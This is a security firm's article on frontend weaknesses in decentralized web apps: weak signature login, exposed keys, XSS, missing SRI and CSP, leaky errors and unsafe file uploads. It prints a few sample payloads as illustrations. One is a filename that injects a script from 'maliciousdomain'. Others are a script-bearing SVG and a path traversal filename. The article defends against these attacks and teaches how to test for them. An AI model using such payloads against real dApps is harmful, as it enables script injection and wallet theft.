DApps do often mimic traditional web applications with frontend and backend layer, just in blockchain space often the backend is primarily a set of smart contracts. Of course, nowadays there are also plenty of hybrid solutions, where part of the application state is held in smart contracts and part in a traditional database, cache or filesystem.
A dApp frontend is usually built using JavaScript frameworks such as React, Vue or Angular, in the same way as traditional web applications. Often it interacts with blockchain nodes via web3 libraries, may contain wallet widgets, or wallet integrations such as Privy, authentication with wallet signatures, and in other aspects it resembles many common features of a regular frontend, focusing mainly on the UI/UX side of application.
It is common to assume that all hacks originate from the backends where "the meat" is. This is not true, and client-side attacks, against frontends and their users can be as damaging as backend compromises and lead to consequences such as drained wallets, manipulated transactions and stolen assets. So, if you want to keep your dApp secure, or learn how to test its security read on. We will discuss:
- Predictable or hardcoded signing message
- Exposed secrets
- Client vs server-side and Security by obscurity
- Unsanitized user-controlled input
- Lack of SRI hashes for external scripts
- Direct IP access
- Missing or insecure CSP implementation
- Disclosing sensitive information in errors/3rd party api requests
- Unrestricted upload to IPFS/Decentralized hosting
Predictable or hardcoded signing message
One of authentication methods in dApps is to obtain user signature and use it as user session identifier. Since the signature allows for derivation of users' public key (address), this works perfectly as an unique session id and both information who the user is without a need of additional encryption or other tokens.
This approach however has some downsides. One of main tradeoffs of such design is lack of 2 factor authentication, and lack of dynamic session management (invalidation, timeout) unless implemented on top of pure signature authentication.
Additionally, there is a bigger risk related to the signatures. If the message used to be signed is predictable or hardcoded, an attacker may create a phishing site or obtain such signature in a similar way, and then reuse it as an authentication token, impersonating the victim.
Consider following login message to be signed:
// An example of the signing message
const message = "I am logging in to the secure dApp";As highlighted below, there is nothing stopping an attacker to try to obtain such a signature with a fake site and then reuse, and additionally, such authentication method does not allow for control of the timestamp, session timeout or adding a 2FA on top of it.
It is not a problem to use the above mechanism for an app that uses blockchain as a read-only data source and allows to aggregate user public data to display it in the application UI, or acts only as an intermediary between user wallet and blockchain RPCs.
However, if an application keeps and processes user data, PII, manages transactions, stores funds and in any means the session ID is used to enable the user to manage anything sensitive like funds or data, then the pure-signature based authentication is not enough and then mature, battle tested frameworks should be used for authentication and authorization.
Exposed secrets
During numerous security assessments, it was possible to identify secrets exposed in javascript files. This may be caused by just a mistake, but specifically, when the application architecture shows that developers do not understand how client-side data is processed vs server-side, some of environment variables that should be secret are still prepended with NEXT_PUBLIC which automatically exposes them server side, or a "regular" mistake when a component is added, e.g. AWS authentication, but no one thinks that it will be visible in the user browser (basically still case no 1). Below you can see of the cases we found during audits/penetration tests.
Rule no. 1: NEVER reinvent the wheel in security.
In dAPPs which consist of authorization based on JWT tokens, often custom implementations are used.
This opens up a variety of attack vectors, including signature forging, lack of signature check, weak secret, or others that we described already in the JWT article.
API keys
In dAPPs there are a lot of external integrations and API keys which shouldn't occur in the client-side could be exposed. The impact on the whole application can differ depending on the API key e.g. if a crucial secret is exposed it could be harmful for the entire backend and malicious users can perform unauthenticated actions.
// Common examples
const BACKEND_API_KEY = "sk_live_51HaBC...";
const NEXT_PUBLIC_ADMIN_SECRET = "supersecret123";
const INTERNAL_API_TOKEN = "Bearer eyJhbGc...";
// Other services
const FIREBASE_API_KEY = "AIzaSyA...";
// AWS credentials
const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";
const AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";Client vs server-side and Security by obscurity
Some of the applications instead of using battle tested authentication frameworks, choose obscure, custom yet a client side way of storing secrets. "Security by obscurity" is a common term to describe a design anti-pattern, where a software relies on a fact that the attack surface is hidden, but once uncovered, there is no defense.
For instance, there was a use case where an application was using client-side generated session ID. The problem is that the first question the attacker can ask is: where does the authentication come from. If it clearly seems to be generated client-side, the compromise is a matter of when, not if. Especially in the AI age, where reverse engineering on client side javascript can be executed in minutes.
In summary, there could be many different keys and secrets exposed in the dApp frontend, so it is crucial to test the entire application before deploying it to production if some keys are exposed.
From a black box perspective, this can be achieved using a proxying tool (such as Burp Suite) to map the entire application, and then searching the proxy history for any secrets. Helpful extensions such as Trufflehog integration could also be useful.
Unsanitized user-controlled input
Another very common misconfiguration in dAPPs is that the application accepts user-controlled input and does not sanitize it later. Such a misconfiguration could lead to different classes of attacks but we would like to focus on Cross-Site Scripting (XSS) which directly affects the dApp frontend
XSS is an ancient and well known issue, but for those who are not familiar with it, it happens when a user is able to inject scripts into the application. This may happen in a reflected manner (when a URL parameter is dynamically displayed as part of the website, and may contain a script) or stored , where it is saved in some place e.g. a comment, and later displayed as HTML/JS.
The reality is that the XSS in dAPPs can be even more devastating than in traditional web applications. Unlike traditional applications where XSS is mainly associated with stealing cookies or session tokens, XSS in dAPPs can directly interact with wallet providers. An attacker can create a special script which calls ethereum.request({method: 'eth_sendTransaction', params: […]}) to prompt users to send funds. Since users are conditioned to approve wallet prompts in dApps, they're more likely to approve a malicious transaction.
When malicious scripts execute in the context of a decentralized application, they can:
- inject transaction prompts,
- perform keylogging,
- steal users session
- get access to private keys stored in local storage,
- do social engineering via wallet prompt
A few not-so-obvious examples where the XSS attacks can be found in dApps are for instance token or transaction names and fields. For instance, a tx memo on some chains could be used to deliver a script. It was also the case of few block explorers to render token names without any sanitization, leading to XSS.
To prevent this kind of scenario it is crucial to map every possible "input" especially when processing raw blockchain data and always use sanitization libraries such as DOMPurify. Moreover, do not use raw-html exposing functions such as dangerouslySetInnerHTML. And apply CSP (described below).
Lack of SRI hashes for external scripts
Speaking of unsanitized user input, the impact of it is the execution of arbitrary JavaScript. But there is also another way a malicious JS can be smuggled to your application.
Modern decentralized applications rely heavily on external JavaScript libraries, such as web3.js, ethers.js, wallet connectors and third-party providers, as well as various UI frameworks, which are loaded from CDNs. The problem is that once they are hosted on a 3rd party server, someone is responsible for their security. And accidents happen. If a widely used library is compromised e.g. because of compromised access to a S3 bucket, git repo or any other way, then its content may be hijacked (see web3.js case)
How to defend against an external script content being suddenly changed to something else? The answer is Subresource Integrity
In short words, the developer calculates a hash of a 3rd party library and attaches it to the page source. The browsers must obey that hash — if the 3rd party file content does not match it, it is not loaded. (SRI) hashing. SRI allows browsers to verify that files fetched from CDNs haven't been tampered with by comparing their cryptographic hash against a known value.
Without subresource integrity, the attackers can inject malicious code into these trusted libraries that will execute js with the dApp context.
// Vulnerable - no SRI hash
<script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
<script src="https://unpkg.com/ethers@5.7.0/dist/ethers.umd.min.js"></script>The properly implemented web3 related libraries should look like the following.
// Web3.js from CDN with SRI hash
<script
src="https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js" integrity="sha384-smhZkYF5HmmdsSfjP+W3SxXOJLjXo1Y6l5t7H/9Yxjnax3ktyJjdS3ZkJ8UKNGwu"
crossorigin="anonymous">
</script>
// Ethers.js from CDN with SRI hash
<script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js" integrity="sha384-R6nFvLKfBGJLxfqiKLPf6UqkQqzNJiH7D8cZr9B5Lt+fvGr3Y2B6s0F5J9uZxF3g"
crossorigin="anonymous">
</script>From a testing perspective, reviewing all <script> and <link> tags in the HTML source code to identify missing integrity attributes should form part of every standard assessment.
Direct IP access
Most web applications are designed to be accessed via their domain names, e.g. https://example-dapp.com. This allows also to setup a WAF (Web application firewall) that enforces rate limit and decent level of protection against basic exploits.
However, many of them fail to properly restrict access via a direct IP address connection e.g. the above application could be accessed via http://192.168.0.12.
This may lead to bypassing WAF when connecting users directly to the server's IP address. Direct IP access should be strictly forbidden.
To catch the bug during a security assessment, a tester may use OSINT techniques, resolve DNS to the ip address, and attempt to connect to the application directly using it. Additionally, common search engines such as SHODAN, FOFA, and CENSYS may help.
Missing or insecure CSP implementation
A very common mistake and often identified is missing or insecure implementation of Content Security Policy (CSP) header. This is one of the most valuable security headers which prevents mainly Cross-Site Scripting (XSS) attacks, by controlling which resources can be loaded and executed on the web page.
As we previously discussed XSS has a more severe impact when it comes to dAPPs so the implementation of this security header is especially important.
Implementing CSP correctly in the dApp environment can be frustrating because it needs to interact with wallet browser extensions and load resources from third-party services or IPFS gateways. So if we are to define which scripts are allowed and which not, we can be easily dragged into dependency hell. This often leads developers to skip CSP entirely or configure it so permissively that there is no real protection. An example of a permissive CSP header is shown below.
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval', https://*.amazonaws.com, https://*.googleapis.com, https://*.walletconnect.comThere are few misconfigurations:
- unsafe-inline in script-src directive — allows inline JavaScript to execute and completely defeats the primary purpose of CSP (most XSS rely on injecting inline scripts),
- unsafe-eval in script-src directive — is also unsafe because it allows the use of dangerous functions like eval(),
- wildcard (*) in the whitelisted domains could be problematic — in the following example any attacker can register their own S3 bucket and host malicious content that would be authorized by this CSP.
To implement CSP correctly, it is necessary to check all the directives that should be implemented and whitelist only the exact domains needed, without wildcards.
Content Security Policy is one of the most powerful defenses against XSS but is consistently misimplemented in dApps. From a testing perspective, always check for the presence and content of CSP headers in HTTP responses. To test whether the CSP is effective we can use this online tool.
Disclosing sensitive information in errors/3rd party api requests
Under the hood, an application frontend may fetch its components from various data sources. This includes other application's subdomains, s3 buckets, or 3rd party services. Those requests are normally not visible to the users — but a hacker/pentester using a tool such as Burp Suite easily sees them all.
It may happen that some of those requests are silently disclosing sensitive information in error messages or other server responses. Additionally it may happen that they disclose sensitive information FROM users to the analytics. One of the security myths is that analytics are generally trusted or harmless. But it already happened that a hack took place and while nothing was officially confirmed, everything pointed out to potential insiders watching the analytics.
One of the examples could be disclosing internal graphql instance in the error message like the following.
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
{"success":false,
"error":{"code":"INTERNAL_SERVER_ERROR","message":"Failed to fetch vaults, Error: All GraphQL endpoints failed: {\"response\":{\"errors\":[{\"message\":\"All GraphQL endpoints failed\",\"extensions\":{\"code\":\"LOAD_BALANCER_ERROR\",\"details\":\"GraphQL errors at https://graph_name.example.com/subgraphs/id/12345
t: [{\\\"message\\\":\\\"Failed to decode `Bytes` value: `Invalid character '\\\\\\\\'' at position 0`\\\"}]\"}}]}Access to the GraphQL instance was open to anyone, meaning the full schema could be retrieved, potentially exposing undocumented GraphQL queries or mutations.
Regarding sending requests to the analytics, they should never contain any sensitive information such as API keys, access tokens or secrets. An example of improperly configured analytics API request is presented below:
POST /api/v1/analytics HTTP/2
Host: example.com
{"timestamp":"timestamp_value",
"action":"page_hit",
"version":"1",
"session_id":"UUID",
"payload":"{\"user-agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\"locale\":\"en-US\",\"location\":\"en-US\",\"referrer\":\"\",\"pathname\":\"/\",\"href\":\"https://example.com/#access_token=eyJhbGciOiJIUzI1NiIsImt[REDACTED]u0w&expires_at=1767176231&expires_in=3600"}"}In order to identify such misconfigurations, it is essential to test all dApps-related endpoints and inspect all traffic that happens when using the application, including this exchanged with 3rd party services.
Unrestricted upload to IPFS/Decentralized hosting
Many decentralized applications use IPFS or static data storage such as S3 to store user-associated data, such as profile images, or user-generated content.
It is common to see it implementing the validation of uploaded files only on the client side. Simply, the Javascript in user browser checks, if the image is valid and then issues a request to an endpoint saving it to IPFS, S3 or other place. This is vulnerable to several potential issues:
Client-side validation
As mentioned above, the proper validation should take place on the server side, which is, the backend. The image shouldn't be straight sent to IPFS or S3 by processing the access credentials in the user's browser's javascript. Instead, the image should be sent to the backend, which acts as an intermediary, performs validation of file: size, type (both content and MIME type), name and extension and only then sent to the storage, while the access credentials to the storage stay at the server side.
XSS in Image upload
A common issue is to allow all type of images, including a special image type which is SVG. In contrary to other binary-structured files, SVG consists of plain XML and may contain scripts or anchors to remote content. Example SVG image may look like this:
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>Depending on how it is later displayed in the application, may lead to cross-site scripting (XSS)
If the decentralized hosting allows for any kind of content to be uploaded it also could be used by attackers as a distribution of malicious files as a part of their campaign.
Lack of filename validation
If the application uses the filename directly, this opens up wide attack surface related to how the file will be saved in the end. For instance, if the user is able to control the extension, it may lead to saving an executable file, or in worst case compromise of the server if a server executable is saved and run in context of the server.
Less damaging may be cases where user can control just the name, which may lead to injecting HTML/JS code into it, for instance saving file as:
abc<script src="https://maliciousdomain/1.js"/>def.pngOr overwriting content on the server by manipulating the file path, using well-known parent directory pattern, for instance:
../../user2/profile.pngThe above file name could lead to overwriting content of another user, if server permissions are not set correctly and the path traversal is not sanitized.
Conclusion
There are always amounts of less common, unexpected or logical security issues which are difficult to describe in one article. However, mitigating everything that is described above in your dApp could greatly minimize the attack surface. So to summarize:
- Understand your authentication model and if its secure for users
- Recognize what is server and client side code. Remember that any client side control can be bypassed by intercepting HTTP traffic and speaking directly to the server, without Javascript being rendered
- Scan for potential secrets in the client-side code. The less it reveals, the smaller the attack surface. Be very cautious when processing user sensitive data, especially private keys or access tokens
- Deploy a WAF on a production application and make sure it is not possible to visit it using secondary IP, or outside of official application domain
- Implement standard hardening: Content Security Policy and SRI are your greatest allies
- Be careful when allowing users to upload files — this is a large attack surface with many pitfalls
…and if you require a comprehensive and reliable security assessment of your dAPP, please contact us via our website.